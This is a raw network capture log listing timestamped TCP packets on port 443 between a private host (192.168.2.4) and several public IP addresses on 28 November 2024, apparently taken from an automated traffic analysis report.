                                                        Nov 28, 2024 13:34:48.959000111 CET49779443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:48.959083080 CET4434977934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:48.959265947 CET49779443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:48.999330997 CET4434977934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:49.058854103 CET4434978613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:49.058909893 CET4434978613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:49.059104919 CET49786443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:49.059856892 CET49786443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:49.059864044 CET4434978613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:49.906549931 CET44349792104.21.53.38192.168.2.4
                                                        Nov 28, 2024 13:34:49.919758081 CET49792443192.168.2.4104.21.53.38
                                                        Nov 28, 2024 13:34:49.919780970 CET44349792104.21.53.38192.168.2.4
                                                        Nov 28, 2024 13:34:49.920901060 CET44349792104.21.53.38192.168.2.4
                                                        Nov 28, 2024 13:34:49.920964956 CET49792443192.168.2.4104.21.53.38
                                                        Nov 28, 2024 13:34:49.965218067 CET49792443192.168.2.4104.21.53.38
                                                        Nov 28, 2024 13:34:49.965285063 CET44349792104.21.53.38192.168.2.4
                                                        Nov 28, 2024 13:34:49.965569973 CET49792443192.168.2.4104.21.53.38
                                                        Nov 28, 2024 13:34:49.965585947 CET44349792104.21.53.38192.168.2.4
                                                        Nov 28, 2024 13:34:50.008162975 CET49792443192.168.2.4104.21.53.38
                                                        Nov 28, 2024 13:34:50.445038080 CET44349792104.21.53.38192.168.2.4
                                                        Nov 28, 2024 13:34:50.445213079 CET44349792104.21.53.38192.168.2.4
                                                        Nov 28, 2024 13:34:50.445379019 CET49792443192.168.2.4104.21.53.38
                                                        Nov 28, 2024 13:34:50.464222908 CET49792443192.168.2.4104.21.53.38
                                                        Nov 28, 2024 13:34:50.464251041 CET44349792104.21.53.38192.168.2.4
                                                        Nov 28, 2024 13:34:51.063457012 CET4434977934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:51.063576937 CET4434977934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:51.063621998 CET49779443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:51.063632011 CET4434977934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:51.063796043 CET4434977934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:51.063888073 CET49779443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:51.063894987 CET4434977934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:51.063997984 CET4434977934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:51.064053059 CET49779443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:52.372625113 CET49779443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:52.372633934 CET4434977934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:52.433979034 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:52.433985949 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:52.434040070 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:52.434242964 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:52.434252977 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:52.435707092 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:52.435738087 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:52.435794115 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:52.435965061 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:52.435975075 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:52.607276917 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:52.607290030 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:52.607345104 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:52.607757092 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:52.607769012 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:53.819130898 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:53.819361925 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:53.819396019 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:53.820399046 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:53.820456028 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:53.820810080 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:53.820873976 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:53.820957899 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:53.820967913 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:54.000875950 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:54.001111984 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:54.001123905 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:54.001991987 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:54.002046108 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:54.014828920 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:54.015428066 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:54.015476942 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:54.015862942 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:54.015868902 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:54.114662886 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:54.151494026 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.154114962 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:54.154124022 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.154405117 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.155697107 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:54.155747890 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.162108898 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:54.203332901 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.387794971 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:54.387860060 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:54.387900114 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:54.387965918 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:54.388017893 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:54.393688917 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:54.546233892 CET49803443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:54.546243906 CET4434980334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:54.673867941 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.673887968 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.673902988 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.673976898 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:54.673985958 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.674035072 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:54.857614994 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.857630968 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.857695103 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:54.857707024 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.857778072 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:54.916444063 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.916460037 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.916516066 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:54.916522980 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:54.916647911 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:55.028498888 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:55.028517008 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:55.028595924 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:55.028601885 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:55.029325008 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:55.035294056 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:55.035346031 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:55.035367012 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:55.035406113 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:55.035666943 CET49798443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:55.035674095 CET4434979813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:55.040009022 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:55.040060043 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:55.040121078 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:55.040369034 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:55.040383101 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:55.374212027 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.374243975 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.374252081 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.374273062 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.374283075 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.374291897 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.374315023 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.374330997 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.374353886 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.374373913 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.498024940 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.498105049 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.574001074 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.574008942 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.574054956 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.574089050 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.574111938 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.574119091 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.574178934 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.628675938 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.628694057 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.628774881 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.628779888 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.689342022 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.689413071 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.689416885 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.740499020 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.740542889 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.740551949 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.740566015 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.740588903 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.740631104 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.741046906 CET49799443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.741055012 CET44349799108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.745652914 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.745671034 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.745739937 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.745970964 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:55.745982885 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:55.898500919 CET49808443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:55.898515940 CET4434980835.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:55.898602962 CET49808443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:55.898811102 CET49808443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:55.898824930 CET4434980835.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:55.922086954 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:55.922110081 CET4434980935.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:55.922188044 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:55.922341108 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:55.922358036 CET4434980935.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:56.841507912 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:56.884352922 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.103466034 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.103498936 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.103852034 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.107168913 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.107239008 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.107347965 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.151367903 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.161046982 CET4434980835.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:57.161451101 CET49808443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:57.161469936 CET4434980835.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:57.162432909 CET4434980835.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:57.162491083 CET49808443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:57.164434910 CET49808443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:57.164491892 CET4434980835.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:57.164747953 CET49808443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:57.164753914 CET4434980835.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:57.219374895 CET49808443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:57.231909990 CET4434980935.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:57.232160091 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.232173920 CET4434980935.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:57.233174086 CET4434980935.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:57.233231068 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.234292030 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.234358072 CET4434980935.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:57.234651089 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.234662056 CET4434980935.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:57.283282995 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.361166954 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:57.361545086 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:57.361555099 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:57.362437010 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:57.362495899 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:57.363890886 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:57.363951921 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:57.364099026 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:57.364104033 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:57.407685041 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:57.479228020 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.479250908 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.479290009 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.479310036 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.479325056 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.479335070 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.479356050 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.479378939 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.638464928 CET4434980835.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:57.638649940 CET49808443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:57.638674021 CET4434980835.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:57.638725042 CET49808443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:57.676584005 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.676603079 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.676687956 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.676711082 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.676997900 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.713046074 CET4434980935.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:57.713123083 CET4434980935.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:57.713186026 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.713219881 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.713234901 CET4434980935.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:57.713255882 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.713414907 CET49809443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.735416889 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.735435009 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.735481024 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.735495090 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:57.735872984 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:57.736283064 CET49811443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.736301899 CET4434981135.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:57.736357927 CET49811443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.738358021 CET49811443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:57.738369942 CET4434981135.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:57.879437923 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:57.879457951 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:57.879535913 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:57.879585981 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:57.879681110 CET4434981334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:57.879760027 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:57.879807949 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:57.879821062 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:57.879945040 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:57.879981041 CET4434981334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:58.103626966 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:58.103635073 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:58.103684902 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:58.103724957 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:58.103737116 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:58.103769064 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:58.103773117 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:58.103780985 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:58.103820086 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:58.103825092 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:58.103833914 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:58.103868008 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:58.104100943 CET49805443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:34:58.104115963 CET4434980513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:34:58.648866892 CET49814443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:58.648894072 CET4434981435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:58.648976088 CET49814443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:58.649369955 CET49814443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:58.649384022 CET4434981435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:58.717020988 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.717041016 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.717047930 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.717081070 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.717112064 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.717134953 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:58.717134953 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:58.717147112 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.717171907 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:58.717192888 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:58.829545021 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.877212048 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:58.923310995 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.923327923 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.923363924 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.923393011 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.923393965 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:58.923403978 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.923441887 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:58.923453093 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:58.977473021 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.977495909 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.977576971 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:58.977583885 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:58.978241920 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:59.039943933 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:59.040133953 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:59.106125116 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:59.106168985 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:59.106189966 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:59.106215000 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:59.106250048 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:59.106587887 CET49807443192.168.2.4108.158.75.10
                                                        Nov 28, 2024 13:34:59.106597900 CET44349807108.158.75.10192.168.2.4
                                                        Nov 28, 2024 13:34:59.201886892 CET4434981334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.202163935 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.202229023 CET4434981334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.203737974 CET4434981334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.203821898 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.212933064 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.213129997 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.213128090 CET4434981334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.241261005 CET4434981135.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:59.244401932 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.244749069 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.244767904 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.244868040 CET49811443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:59.244883060 CET4434981135.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:59.245199919 CET4434981135.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:59.245996952 CET49811443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:59.246049881 CET4434981135.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:59.246360064 CET49811443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:34:59.248156071 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.248222113 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.248609066 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.248689890 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.248852968 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.259327888 CET4434981334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.267616034 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.267666101 CET4434981334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.287332058 CET4434981135.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:34:59.295332909 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.298202991 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.298209906 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.320816994 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.353645086 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.659970999 CET4434981334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.660065889 CET4434981334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.660135984 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.719716072 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.719927073 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.719974995 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.729978085 CET49813443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.730021000 CET4434981334.107.203.234192.168.2.4
